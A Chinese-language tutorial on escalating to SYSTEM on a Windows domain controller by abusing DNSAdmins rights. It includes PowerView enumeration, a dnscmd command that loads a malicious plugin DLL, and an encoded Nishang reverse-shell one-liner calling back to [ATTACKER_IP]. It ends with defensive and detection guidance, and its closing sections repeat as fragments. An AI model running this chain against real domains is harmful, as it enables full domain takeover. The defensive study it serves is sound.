滥用DNSAdmins权限进行域内提权攻击详解<\/h1>

攻击原理概述<\/h2>
DNSAdmins组成员或对DNS服务具有写权限的用户可以加载任意DLL到DNS服务中，由于DNS服务通常以SYSTEM权限运行，这可能导致权限提升。在企业环境中，域控制器通常也作为DNS服务器，使得这种攻击尤为危险。<\/p>

攻击前提条件<\/h2>

攻击者需要是DNSAdmins组成员<\/li>
或者对SYSTEM权限下的DNS服务具有写权限<\/li>

能够加载任意DLL到目标系统<\/li> <\/ol>

攻击步骤详解<\/h2>

1. 信息收集<\/h3>

使用PowerView检查DNSAdmins组成员：<\/p>

Get-NetGroupMember -GroupName "DNSAdmins"<\/span>
<\/span><\/span><\/code><\/pre>2. 定位目标用户<\/h3>
使用PowerView的Invoke-UserHunter寻找目标用户的可用token：<\/p>
Invoke-UserHunter -UserName buildadmin
<\/span><\/span><\/code><\/pre>3. 准备恶意DLL<\/h3>
推荐使用修改版的mimilib.dll：<\/p>

原始版本：记录DNS请求到C:\Windows\system32\kiwidns.log<\/code><\/li>
可修改版本：插入Nishang的PowerShell反弹脚本<\/li>
<\/ul>
修改kdns.c<\/code>文件，插入编码后的PowerShell反弹脚本：<\/p>
Invoke-Encode -ScriptBlock {Invoke-PowerShellTcpOneLine -Reverse -IPAddress [ATTACKER_IP]<\/span> -Port [PORT]<\/span>}
<\/span><\/span><\/code><\/pre>4. 加载恶意DLL<\/h3>
使用dnscmd命令配置DNS服务加载恶意DLL：<\/p>
dnscmd ops_dc \/config \/serverlevelplugindll \\ops-build\dll\mimilib.dll
<\/span><\/span><\/code><\/pre>注意<\/strong>：DLL必须通过UNC路径或本地路径加载，且路径必须能被域控访问。<\/p>
5. 验证DLL加载<\/h3>
检查注册表确认DLL是否成功加载：<\/p>
Get-ItemProperty HKLM:<\/span>\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll
<\/span><\/span><\/code><\/pre>6. 重启DNS服务<\/h3>
需要本地管理员权限重启DNS服务：<\/p>
sc \\ops-dc stop dns
<\/span><\/span>sc \\ops-dc start dns
<\/span><\/span><\/code><\/pre>7. 获取权限<\/h3>
成功加载后：<\/p>

如果DNS服务运行在域控上：获得域控的SYSTEM权限<\/li>
如果DNS服务不在域控上：获得DNS服务器的SYSTEM权限<\/li>
<\/ul>
攻击场景分析<\/h2>


域控与DNS服务器同一主机<\/strong>：<\/p>

最危险的情况<\/li>
可直接获得域控的SYSTEM权限<\/li>
完全控制域环境<\/li>
<\/ul>
<\/li>

域控与DNS服务器分离<\/strong>：<\/p>

获得DNS服务器的SYSTEM权限<\/li>
可控制DNS服务但无法直接控制域控<\/li>
<\/ul>
<\/li>
<\/ol>
防御与检测措施<\/h2>
防御措施<\/h3>

严格审查DNSAdmins组成员<\/li>
限制对DNS服务器对象的权限<\/li>
监控DNS服务配置变更<\/li>
<\/ol>
检测方法<\/h3>


事件日志监控<\/strong>：<\/p>

DNS服务重启事件：

事件ID 150：重启失败<\/li>
事件ID 770：重启成功<\/li>
<\/ul>
<\/li>
Microsoft-Windows-DNS-Server\/Audit日志中的事件ID 541<\/li>
<\/ul>
<\/li>

注册表监控<\/strong>：<\/p>

监控HKLM:\SYSTEM\CurrentControlSet\services\DNS\Parameters\ServerLevelPluginDll<\/code>的变更<\/li>
<\/ul>
<\/li>

文件监控<\/strong>：<\/p>

监控C:\Windows\system32\kiwidns.log<\/code>的创建和修改<\/li>
<\/ul>
<\/li>
<\/ol>
技术要点总结<\/h2>


DLL加载限制<\/strong>：<\/p>

必须使用绝对路径<\/li>
支持UNC路径但不支持c$<\/code>等管理共享<\/li>
不支持HTTP等远程协议加载<\/li>
<\/ul>
<\/li>

权限要求<\/strong>：<\/p>

需要DNSAdmins权限或DNS服务写权限<\/li>
重启DNS服务需要本地管理员权限<\/li>
<\/ul>
<\/li>

攻击影响<\/strong>：<\/p>

可能导致完全域控沦陷<\/li>
攻击隐蔽性较高<\/li>
<\/ul>
<\/li>
<\/ol>
参考资源<\/h2>

原始技术文章<\/a><\/li>
Shay Ber的文章<\/a><\/li>
mimilib项目<\/a><\/li>
Nishang项目<\/a><\/li>
<\/ol>

滥用DNSAdmins权限进行域内提权攻击详解<\/h1>

攻击原理概述<\/h2> DNSAdmins组成员或对DNS服务具有写权限的用户可以加载任意DLL到DNS服务中，由于DNS服务通常以SYSTEM权限运行，这可能导致权限提升。在企业环境中，域控制器通常也作为DNS服务器，使得这种攻击尤为危险。<\/p>

攻击步骤详解<\/h2>

防御与检测措施<\/h2>

参考资源<\/h2> 原始技术文章<\/a><\/li> Shay Ber的文章<\/a><\/li> mimilib项目<\/a><\/li> Nishang项目<\/a><\/li> <\/ol>

攻击原理概述<\/h2>
DNSAdmins组成员或对DNS服务具有写权限的用户可以加载任意DLL到DNS服务中，由于DNS服务通常以SYSTEM权限运行，这可能导致权限提升。在企业环境中，域控制器通常也作为DNS服务器，使得这种攻击尤为危险。<\/p>

参考资源<\/h2>

原始技术文章<\/a><\/li>
Shay Ber的文章<\/a><\/li>
mimilib项目<\/a><\/li>
Nishang项目<\/a><\/li> <\/ol>